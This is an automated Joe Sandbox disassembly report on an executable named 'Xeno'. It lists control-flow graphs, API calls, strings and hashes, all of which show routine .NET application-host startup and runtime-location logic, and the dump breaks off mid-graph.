                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: Event$Source_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDeregisterRegisterReport
                                                                                      • String ID: ($.NET Runtime$Application: $Description: A .NET application failed.$Message: $Path:
                                                                                      • API String ID: 1590356926-970997692
                                                                                      • Opcode ID: a0e85a36dfb1ee2e78e2b6364583cebff17205b721a9b090096a532bd07185ec
                                                                                      • Instruction ID: 1873484965590bd97ddbdf7cbca1ebdd91f67998865a4275590abab198654ef1
                                                                                      • Opcode Fuzzy Hash: a0e85a36dfb1ee2e78e2b6364583cebff17205b721a9b090096a532bd07185ec
                                                                                      • Instruction Fuzzy Hash: 84B16866B14B41D5EB14DB61E4102AD2761FF48B98F84053BCE4E9BBA8EF7CE148C361

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: __p___argc__p___wargv__scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock_cexit_exit_get_initial_wide_environment_register_thread_local_exe_atexit_callback
                                                                                      • String ID:
                                                                                      • API String ID: 2955606470-0
                                                                                      • Opcode ID: 31dcba92d53d7d5c9a7d258846d929b8af869ad0fecb2b87c37cc57a296dab70
                                                                                      • Instruction ID: ce7b6768fc822cfca8d989a6604c53354acc21546ad5c40bf1c1c6dad8062d2e
                                                                                      • Opcode Fuzzy Hash: 31dcba92d53d7d5c9a7d258846d929b8af869ad0fecb2b87c37cc57a296dab70
                                                                                      • Instruction Fuzzy Hash: 19312721E08646C2FA50AB25D555BB91291BF45784F44403EEE4EDF697FEBCA84CC232

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize_configthreadlocale_initialize_onexit_table_initialize_wide_environment
                                                                                      • String ID:
                                                                                      • API String ID: 2955177221-0
                                                                                      • Opcode ID: 1b51e065acfffadd2350276333c27bd42dcabc02b54e18d4f546fda920460237
                                                                                      • Instruction ID: 3c62d0c5c4d6dfc060a8c9dac7c013c9383aa8c36633a11dfa8c05c4d66ea893
                                                                                      • Opcode Fuzzy Hash: 1b51e065acfffadd2350276333c27bd42dcabc02b54e18d4f546fda920460237
                                                                                      • Instruction Fuzzy Hash: 4E115411E08242C2FA2477B29556AB91196AF51341F84083EED4DDA2C3FEADB84DC2B3

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 888 7ff68d5ee650-7ff68d5ee695 889 7ff68d5ee6e4 888->889 890 7ff68d5ee697-7ff68d5ee6dc call 7ff68d5e6070 call 7ff68d5e7c60 888->890 891 7ff68d5ee6e7-7ff68d5ee6eb 889->891 890->889 906 7ff68d5ee6de-7ff68d5ee6e2 890->906 893 7ff68d5ee731-7ff68d5ee734 891->893 894 7ff68d5ee6ed-7ff68d5ee6f5 891->894 897 7ff68d5ee761-7ff68d5ee796 893->897 898 7ff68d5ee736-7ff68d5ee73b 893->898 894->893 896 7ff68d5ee6f7-7ff68d5ee70e 894->896 902 7ff68d5ee710-7ff68d5ee723 896->902 903 7ff68d5ee72c call 7ff68d5f0d00 896->903 901 7ff68d5ee79a call 7ff68d5e87b0 897->901 904 7ff68d5ee740-7ff68d5ee75c call 7ff68d5e7720 call 7ff68d5e5480 898->904 905 7ff68d5ee73d 898->905 907 7ff68d5ee79f-7ff68d5ee7a1 901->907 902->903 908 7ff68d5ee725-7ff68d5ee72b _invalid_parameter_noinfo_noreturn 902->908 903->893 921 7ff68d5eec6b-7ff68d5eec90 call 7ff68d5f0ce0 904->921 905->904 906->891 911 7ff68d5ee7a3-7ff68d5ee7ab 907->911 912 7ff68d5ee7cf-7ff68d5ee7db call 7ff68d5ec5f0 907->912 908->903 915 7ff68d5ee7b0-7ff68d5ee7ca call 7ff68d5e7720 911->915 916 7ff68d5ee7ad 911->916 923 7ff68d5ee7fe-7ff68d5ee823 call 7ff68d5e7720 912->923 924 7ff68d5ee7dd 912->924 927 7ff68d5ee875-7ff68d5ee8c6 call 7ff68d5e8ef0 call 7ff68d5e7dd0 * 2 call 7ff68d5e8ef0 call 7ff68d5ecd20 915->927 916->915 923->927 935 7ff68d5ee825-7ff68d5ee842 923->935 928 7ff68d5ee7e2 call 7ff68d5ebb10 924->928 966 7ff68d5ee901-7ff68d5ee903 927->966 967 7ff68d5ee8c8-7ff68d5ee8de 927->967 932 7ff68d5ee7e7-7ff68d5ee7e9 928->932 932->923 934 7ff68d5ee7eb-7ff68d5ee7f9 call 7ff68d5e77d0 932->934 946 7ff68d5eebd6-7ff68d5eebde 934->946 938 7ff68d5ee844-7ff68d5ee84b 935->938 939 7ff68d5ee86a-7ff68d5ee870 call 7ff68d5e6600 935->939 942 7ff68d5ee850-7ff68d5ee868 call 7ff68d5f5200 938->942 943 7ff68d5ee84d 938->943 939->927 942->927 943->942 949 7ff68d5eebe0-7ff68d5eebf6 946->949 950 7ff68d5eec19-7ff68d5eec2c 946->950 955 7ff68d5eec14 call 7ff68d5f0d00 949->955 956 7ff68d5eebf8-7ff68d5eec0b 949->956 952 7ff68d5eec2e-7ff68d5eec45 950->952 953 7ff68d5eec68 950->953 957 7ff68d5eec63 call 7ff68d5f0d00 952->957 958 7ff68d5eec47-7ff68d5eec5a 952->958 953->921 955->950 956->955 960 7ff68d5eec0d-7ff68d5eec13 _invalid_parameter_noinfo_noreturn 956->960 957->953 958->957 962 7ff68d5eec5c-7ff68d5eec62 _invalid_parameter_noinfo_noreturn 958->962 960->955 962->957 970 7ff68d5eeb60-7ff68d5eeb86 call 7ff68d5eddf0 966->970 971 7ff68d5ee909-7ff68d5ee90f 966->971 968 7ff68d5ee8e0-7ff68d5ee8f3 967->968 969 7ff68d5ee8fc call 7ff68d5f0d00 967->969 968->969 975 7ff68d5ee8f5-7ff68d5ee8fb _invalid_parameter_noinfo_noreturn 968->975 969->966 980 7ff68d5eeb89-7ff68d5eeb91 970->980 973 7ff68d5ee911-7ff68d5ee921 call 7ff68d5ec5f0 971->973 974 7ff68d5ee92d-7ff68d5ee97a call 7ff68d5ebd80 call 7ff68d5ec3c0 971->974 973->974 985 7ff68d5ee923 973->985 993 7ff68d5ee9b4-7ff68d5ee9b9 974->993 994 7ff68d5ee97c-7ff68d5ee993 974->994 975->969 983 7ff68d5eeb93-7ff68d5eeba9 980->983 984 7ff68d5eebcc-7ff68d5eebd1 980->984 987 7ff68d5eebab-7ff68d5eebbe 983->987 988 7ff68d5eebc7 call 7ff68d5f0d00 983->988 984->946 989 7ff68d5ee928 call 7ff68d5ebb10 985->989 987->988 991 7ff68d5eebc0-7ff68d5eebc6 _invalid_parameter_noinfo_noreturn 987->991 988->984 989->974 991->988 995 7ff68d5ee9be-7ff68d5eea37 call 7ff68d5e7670 call 7ff68d5eb670 call 7ff68d5e8a50 993->995 996 7ff68d5ee9bb 993->996 997 7ff68d5ee995-7ff68d5ee9a8 994->997 998 7ff68d5ee9ae-7ff68d5ee9b3 call 7ff68d5f0d00 994->998 1011 7ff68d5eea3c-7ff68d5eea8f call 7ff68d5e77d0 995->1011 1012 7ff68d5eea39 995->1012 996->995 997->998 1000 7ff68d5eeb50-7ff68d5eeb56 _invalid_parameter_noinfo_noreturn 997->1000 998->993 1003 7ff68d5eeb57 call 7ff68d5f0d00 1000->1003 1008 7ff68d5eeb5c-7ff68d5eeb5e 1003->1008 1008->980 1015 7ff68d5eea91-7ff68d5eeaa8 1011->1015 1016 7ff68d5eeacc-7ff68d5eead4 1011->1016 1012->1011 1019 7ff68d5eeaaa-7ff68d5eeabd 1015->1019 1020 7ff68d5eeac6-7ff68d5eeacb call 7ff68d5f0d00 1015->1020 1017 7ff68d5eeb0f-7ff68d5eeb21 1016->1017 1018 7ff68d5eead6-7ff68d5eeaec 1016->1018 1017->1008 1024 7ff68d5eeb23-7ff68d5eeb39 1017->1024 1022 7ff68d5eeaee-7ff68d5eeb01 1018->1022 1023 7ff68d5eeb0a call 7ff68d5f0d00 1018->1023 1019->1020 1025 7ff68d5eeabf-7ff68d5eeac5 _invalid_parameter_noinfo_noreturn 1019->1025 1020->1016 1022->1023 1027 7ff68d5eeb03-7ff68d5eeb09 _invalid_parameter_noinfo_noreturn 1022->1027 1023->1017 1024->1003 1029 7ff68d5eeb3b-7ff68d5eeb4e 1024->1029 1025->1020 1027->1023 1029->1000 1029->1003
                                                                                      APIs
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EE725
                                                                                        • Part of subcall function 00007FF68D5E7C60: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E7CFA
                                                                                        • Part of subcall function 00007FF68D5E7C60: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E7DAA
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EE8F5
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EEABF
                                                                                        • Part of subcall function 00007FF68D5EBB10: GetEnvironmentVariableW.KERNEL32 ref: 00007FF68D5EBB71
                                                                                        • Part of subcall function 00007FF68D5EBB10: GetLastError.KERNEL32 ref: 00007FF68D5EBB7D
                                                                                        • Part of subcall function 00007FF68D5EBB10: GetCurrentProcess.KERNEL32 ref: 00007FF68D5EBBB1
                                                                                        • Part of subcall function 00007FF68D5EBB10: IsWow64Process.KERNEL32 ref: 00007FF68D5EBBBF
                                                                                        • Part of subcall function 00007FF68D5EBB10: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EBD47
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EEB03
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EEB50
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EEBC0
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EEC0D
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EEC5C
                                                                                        • Part of subcall function 00007FF68D5E77D0: __stdio_common_vswprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7821
                                                                                        • Part of subcall function 00007FF68D5E77D0: __stdio_common_vsnwprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E78F1
                                                                                        • Part of subcall function 00007FF68D5E77D0: OutputDebugStringW.KERNEL32 ref: 00007FF68D5E78FA
                                                                                        • Part of subcall function 00007FF68D5E77D0: SwitchToThread.KERNEL32 ref: 00007FF68D5E792B
                                                                                        • Part of subcall function 00007FF68D5E77D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E795D
                                                                                        • Part of subcall function 00007FF68D5E77D0: fputws.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E796E
                                                                                        • Part of subcall function 00007FF68D5E77D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7979
                                                                                        • Part of subcall function 00007FF68D5E77D0: fputwc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7987
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Process__acrt_iob_func$CurrentDebugEnvironmentErrorLastOutputStringSwitchThreadVariableWow64__stdio_common_vsnwprintf_s__stdio_common_vswprintffputwcfputws
                                                                                      • String ID: %sApp: %sArchitecture: %sApp host version: %s.NET location: %sLearn more:https://aka.ms/dotnet/app-launch-failedDownload$8.0.8$Considering fxr version=[%s]...$Detected latest fxr version=[%s]...$Error: [%s] does not contain any version-numbered child folders$Error: the default install location cannot be obtained.$Error: the required library %s could not be found in [%s]$Not found$Reading fx resolver directory=[%s]$Resolved fxr [%s]...$The required library %s could not be found. Searched with root path [%s], environment variable [%s], default install location [%s]$Using environment variable %s=[%s] as runtime location.$Using global installation location [%s] as runtime location.$You must install .NET to run this application.$fxr$host$hostfxr.dll$x64
                                                                                      • API String ID: 1074774984-1572664868
                                                                                      • Opcode ID: 4dc31c3db0618a5b2c192f6cf9b8861f8251da865e32cb85157470ac3f7ebceb
                                                                                      • Instruction ID: 207d1ae424abe4a51df62f6892c7920927308b03a5b3fb7e4f3cbaae33be807d
                                                                                      • Opcode Fuzzy Hash: 4dc31c3db0618a5b2c192f6cf9b8861f8251da865e32cb85157470ac3f7ebceb
                                                                                      • Instruction Fuzzy Hash: BC028462E18A96D1EB00EB64E4402BD2361FF44794F40163BEE5D97AD9EF7CE189C321

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1550 7ff68d5ebd80-7ff68d5ebe0f call 7ff68d5e6070 1553 7ff68d5ebe15-7ff68d5ebe3d GetEnvironmentVariableW 1550->1553 1554 7ff68d5ec14b-7ff68d5ec20f call 7ff68d5e6070 call 7ff68d5e9250 call 7ff68d5e5500 call 7ff68d5e5620 1550->1554 1555 7ff68d5ebe75-7ff68d5ebea1 call 7ff68d5f0fbc GetEnvironmentVariableW 1553->1555 1556 7ff68d5ebe3f-7ff68d5ebe4a GetLastError 1553->1556 1586 7ff68d5ec211-7ff68d5ec227 1554->1586 1587 7ff68d5ec24b-7ff68d5ec253 1554->1587 1555->1556 1570 7ff68d5ebea3 1555->1570 1558 7ff68d5ebe6e-7ff68d5ebe70 1556->1558 1559 7ff68d5ebe4c-7ff68d5ebe4e 1556->1559 1565 7ff68d5ebefe-7ff68d5ebf00 1558->1565 1562 7ff68d5ebe50-7ff68d5ebe53 1559->1562 1563 7ff68d5ebe58-7ff68d5ebe69 call 7ff68d5e7a60 1559->1563 1562->1563 1563->1558 1565->1554 1569 7ff68d5ebf06-7ff68d5ebf96 call 7ff68d5e6070 * 2 1565->1569 1588 7ff68d5ebfba 1569->1588 1589 7ff68d5ebf98-7ff68d5ebf9b 1569->1589 1573 7ff68d5ebea6-7ff68d5ebeae 1570->1573 1573->1573 1576 7ff68d5ebeb0-7ff68d5ebeb8 1573->1576 1579 7ff68d5ebeba-7ff68d5ebee5 call 7ff68d5f5200 1576->1579 1580 7ff68d5ebee7-7ff68d5ebeef call 7ff68d5e6600 1576->1580 1585 7ff68d5ebef4-7ff68d5ebefc call 7ff68d5f0d00 1579->1585 1580->1585 1585->1565 1592 7ff68d5ec245-7ff68d5ec24a call 7ff68d5f0d00 1586->1592 1593 7ff68d5ec229-7ff68d5ec23c 1586->1593 1596 7ff68d5ec255-7ff68d5ec26b 1587->1596 1597 7ff68d5ec28e-7ff68d5ec2a7 1587->1597 1598 7ff68d5ebfbc-7ff68d5ebfc0 1588->1598 1594 7ff68d5ebf9d 1589->1594 1595 7ff68d5ebfb6-7ff68d5ebfb8 1589->1595 1592->1587 1593->1592 1604 7ff68d5ec23e-7ff68d5ec244 _invalid_parameter_noinfo_noreturn 1593->1604 1606 7ff68d5ebfa0-7ff68d5ebfa6 1594->1606 1595->1598 1607 7ff68d5ec26d-7ff68d5ec280 1596->1607 1608 7ff68d5ec289 call 7ff68d5f0d00 1596->1608 1602 7ff68d5ec2e3-7ff68d5ec2f7 1597->1602 1603 7ff68d5ec2a9-7ff68d5ec2c0 1597->1603 1599 7ff68d5ebfc2-7ff68d5ebfd4 1598->1599 1600 7ff68d5ebff7-7ff68d5ebff9 1598->1600 1610 7ff68d5ebfef-7ff68d5ebff2 call 7ff68d5f0d00 1599->1610 1611 7ff68d5ebfd6-7ff68d5ebfe9 1599->1611 1613 7ff68d5ec0af 1600->1613 1614 7ff68d5ebfff-7ff68d5ec022 1600->1614 1617 7ff68d5ec333-7ff68d5ec350 1602->1617 1618 7ff68d5ec2f9-7ff68d5ec310 1602->1618 1615 7ff68d5ec2c2-7ff68d5ec2d5 1603->1615 1616 7ff68d5ec2de call 7ff68d5f0d00 1603->1616 1604->1592 1606->1588 1620 7ff68d5ebfa8-7ff68d5ebfb4 1606->1620 1607->1608 1609 7ff68d5ec282-7ff68d5ec288 _invalid_parameter_noinfo_noreturn 1607->1609 1608->1597 1609->1608 1610->1600 1611->1610 1624 7ff68d5ec08e-7ff68d5ec094 _invalid_parameter_noinfo_noreturn 1611->1624 1621 7ff68d5ec0b2-7ff68d5ec0d0 1613->1621 1626 7ff68d5ec3ac-7ff68d5ec3b2 call 7ff68d5e5ec0 1614->1626 1627 7ff68d5ec028-7ff68d5ec05e call 7ff68d5e6070 1614->1627 1615->1616 1628 7ff68d5ec2d7-7ff68d5ec2dd _invalid_parameter_noinfo_noreturn 1615->1628 1616->1602 1622 7ff68d5ec352-7ff68d5ec369 1617->1622 1623 7ff68d5ec38c-7ff68d5ec3ab call 7ff68d5f0ce0 1617->1623 1630 7ff68d5ec312-7ff68d5ec325 1618->1630 1631 7ff68d5ec32e call 7ff68d5f0d00 1618->1631 1620->1595 1620->1606 1632 7ff68d5ec0d2-7ff68d5ec0fa call 7ff68d5f5200 1621->1632 1633 7ff68d5ec0fc-7ff68d5ec109 call 7ff68d5e6600 1621->1633 1634 7ff68d5ec36b-7ff68d5ec37e 1622->1634 1635 7ff68d5ec387 call 7ff68d5f0d00 1622->1635 1639 7ff68d5ec095 call 7ff68d5f0d00 1624->1639 1652 7ff68d5ec060-7ff68d5ec077 1627->1652 1653 7ff68d5ec09a-7ff68d5ec0ad 1627->1653 1628->1616 1630->1631 1640 7ff68d5ec327-7ff68d5ec32d _invalid_parameter_noinfo_noreturn 1630->1640 1631->1617 1654 7ff68d5ec10a-7ff68d5ec10e 1632->1654 1633->1654 1634->1635 1643 7ff68d5ec380-7ff68d5ec386 _invalid_parameter_noinfo_noreturn 1634->1643 1635->1623 1639->1653 1640->1631 1643->1635 1652->1639 1655 7ff68d5ec079-7ff68d5ec08c 1652->1655 1653->1621 1656 7ff68d5ec110-7ff68d5ec122 1654->1656 1657 7ff68d5ec148 1654->1657 1655->1624 1655->1639 1658 7ff68d5ec124-7ff68d5ec137 1656->1658 1659 7ff68d5ec140-7ff68d5ec143 call 7ff68d5f0d00 1656->1659 1657->1554 1658->1659 1660 7ff68d5ec139-7ff68d5ec13f _invalid_parameter_noinfo_noreturn 1658->1660 1659->1657 1660->1659
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$EnvironmentVariable$ErrorLast
                                                                                      • String ID: Failed to read environment variable [%s], HRESULT: 0x%X$HKEY_CURRENT_USER\$InstallLocation$SOFTWARE\dotnet$\Setup\InstalledVersions\$_DOTNET_TEST_GLOBALLY_REGISTERED_PATH$_DOTNET_TEST_REGISTRY_PATH
                                                                                      • API String ID: 2305241113-838692886
                                                                                      • Opcode ID: bd03993e2558fc50f3e21a5c2b74fa1683895c55ddb061550c2b27d4635181d9
                                                                                      • Instruction ID: d2f75b254e504c56d409eed0396880d21dc94ca18f7da28f2097851b53be3c5d
                                                                                      • Opcode Fuzzy Hash: bd03993e2558fc50f3e21a5c2b74fa1683895c55ddb061550c2b27d4635181d9
                                                                                      • Instruction Fuzzy Hash: B402A562E18B81C1EB00EB65E4403AD6361FF85794F40563AEEAD97AD9EF7CE084C711

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1662 7ff68d5e7290-7ff68d5e72e1 1663 7ff68d5e72e3-7ff68d5e72e5 1662->1663 1664 7ff68d5e72ea-7ff68d5e7304 1662->1664 1665 7ff68d5e7601-7ff68d5e7605 1663->1665 1666 7ff68d5e732f-7ff68d5e7379 __acrt_iob_func GetEnvironmentVariableW 1664->1666 1667 7ff68d5e7306 1664->1667 1671 7ff68d5e7640-7ff68d5e766c call 7ff68d5f0ce0 1665->1671 1672 7ff68d5e7607-7ff68d5e761d 1665->1672 1669 7ff68d5e73b3-7ff68d5e73df call 7ff68d5f0fbc GetEnvironmentVariableW 1666->1669 1670 7ff68d5e737b-7ff68d5e7386 GetLastError 1666->1670 1668 7ff68d5e7310-7ff68d5e7319 1667->1668 1673 7ff68d5e7320-7ff68d5e732d 1668->1673 1674 7ff68d5e731b SwitchToThread 1668->1674 1669->1670 1691 7ff68d5e73e1 1669->1691 1675 7ff68d5e747f-7ff68d5e74a8 GetEnvironmentVariableW 1670->1675 1676 7ff68d5e738c-7ff68d5e738e 1670->1676 1677 7ff68d5e761f-7ff68d5e7632 1672->1677 1678 7ff68d5e763b call 7ff68d5f0d00 1672->1678 1673->1666 1673->1668 1674->1673 1684 7ff68d5e74aa-7ff68d5e74d6 call 7ff68d5f0fbc GetEnvironmentVariableW 1675->1684 1685 7ff68d5e74d8-7ff68d5e74e3 GetLastError 1675->1685 1682 7ff68d5e7390-7ff68d5e7393 1676->1682 1683 7ff68d5e7398-7ff68d5e73ae call 7ff68d5e7a60 1676->1683 1677->1678 1686 7ff68d5e7634-7ff68d5e763a _invalid_parameter_noinfo_noreturn 1677->1686 1678->1671 1682->1683 1683->1675 1684->1685 1706 7ff68d5e7510-7ff68d5e7519 1684->1706 1692 7ff68d5e757f-7ff68d5e758e 1685->1692 1693 7ff68d5e74e9-7ff68d5e74eb 1685->1693 1686->1678 1698 7ff68d5e73e4-7ff68d5e73ed 1691->1698 1699 7ff68d5e7590-7ff68d5e75a6 1692->1699 1700 7ff68d5e75c9-7ff68d5e75df 1692->1700 1694 7ff68d5e74f5-7ff68d5e750b call 7ff68d5e7a60 1693->1694 1695 7ff68d5e74ed-7ff68d5e74f0 1693->1695 1694->1692 1695->1694 1698->1698 1707 7ff68d5e73ef-7ff68d5e73f6 1698->1707 1701 7ff68d5e75c4 call 7ff68d5f0d00 1699->1701 1702 7ff68d5e75a8-7ff68d5e75bb 1699->1702 1704 7ff68d5e75e1-7ff68d5e75f6 call 7ff68d5e77d0 1700->1704 1705 7ff68d5e75fb-7ff68d5e75fd 1700->1705 1701->1700 1702->1701 1710 7ff68d5e75bd-7ff68d5e75c3 _invalid_parameter_noinfo_noreturn 1702->1710 1704->1705 1705->1665 1706->1706 1713 7ff68d5e751b-7ff68d5e7522 1706->1713 1708 7ff68d5e7425-7ff68d5e742c call 7ff68d5e6600 1707->1708 1709 7ff68d5e73f8-7ff68d5e7423 call 7ff68d5f5200 1707->1709 1720 7ff68d5e7431-7ff68d5e7460 call 7ff68d5f0d00 _wfsopen 1708->1720 1709->1720 1710->1701 1717 7ff68d5e7524-7ff68d5e754f call 7ff68d5f5200 1713->1717 1718 7ff68d5e7551-7ff68d5e755b call 7ff68d5e6600 1713->1718 1725 7ff68d5e7560-7ff68d5e757c call 7ff68d5f0d00 _wtoi 1717->1725 1718->1725 1728 7ff68d5e7462-7ff68d5e747a setvbuf 1720->1728 1729 7ff68d5e747c 1720->1729 1725->1692 1728->1675 1729->1675
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentVariable$ErrorLast_invalid_parameter_noinfo_noreturn$SwitchThread__acrt_iob_func
                                                                                      • String ID: COREHOST_TRACEFILE$COREHOST_TRACE_VERBOSITY$Failed to read environment variable [%s], HRESULT: 0x%X$Unable to open COREHOST_TRACEFILE=%s for writing
                                                                                      • API String ID: 3179431274-1641920025
                                                                                      • Opcode ID: d74708f292f952ed6c767e8968ee098dc311afd952f5a0b8892f582495c91cf9
                                                                                      • Instruction ID: aaf832b4cac9411916243e83f6081dc10c350a6bf5fe916bba0dac74216bd146
                                                                                      • Opcode Fuzzy Hash: d74708f292f952ed6c767e8968ee098dc311afd952f5a0b8892f582495c91cf9
                                                                                      • Instruction Fuzzy Hash: 85B19D62F14A12C5FB00AB65E8402BD26A1BF48B94F54053BDE1DD7AA4FF7CE489C361

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1731 7ff68d5ec810-7ff68d5ec848 1732 7ff68d5ec84d-7ff68d5ec882 call 7ff68d5ebd80 1731->1732 1733 7ff68d5ec84a 1731->1733 1736 7ff68d5ec884-7ff68d5ec89e call 7ff68d5ec3c0 1732->1736 1737 7ff68d5ec8f5-7ff68d5ec925 RegOpenKeyExW 1732->1737 1733->1732 1750 7ff68d5ec8a3-7ff68d5ec8ba call 7ff68d5e7670 1736->1750 1751 7ff68d5ec8a0 1736->1751 1738 7ff68d5ec95e-7ff68d5ec98d RegGetValueW 1737->1738 1739 7ff68d5ec927-7ff68d5ec92a 1737->1739 1744 7ff68d5ec993-7ff68d5ec998 1738->1744 1745 7ff68d5ecadc-7ff68d5ecaee call 7ff68d5e7670 RegCloseKey 1738->1745 1741 7ff68d5ec92c-7ff68d5ec946 call 7ff68d5e7670 1739->1741 1742 7ff68d5ec94b-7ff68d5ec959 call 7ff68d5e7670 1739->1742 1762 7ff68d5ecaf4 1741->1762 1742->1762 1744->1745 1746 7ff68d5ec99e-7ff68d5ec9b3 1744->1746 1745->1762 1752 7ff68d5ec9b5-7ff68d5ec9b9 1746->1752 1753 7ff68d5eca1c 1746->1753 1750->1737 1765 7ff68d5ec8bc-7ff68d5ec8d2 1750->1765 1751->1750 1760 7ff68d5ec9c0-7ff68d5ec9c7 1752->1760 1761 7ff68d5ec9bb-7ff68d5ec9be 1752->1761 1758 7ff68d5eca20-7ff68d5eca4b RegGetValueW 1753->1758 1763 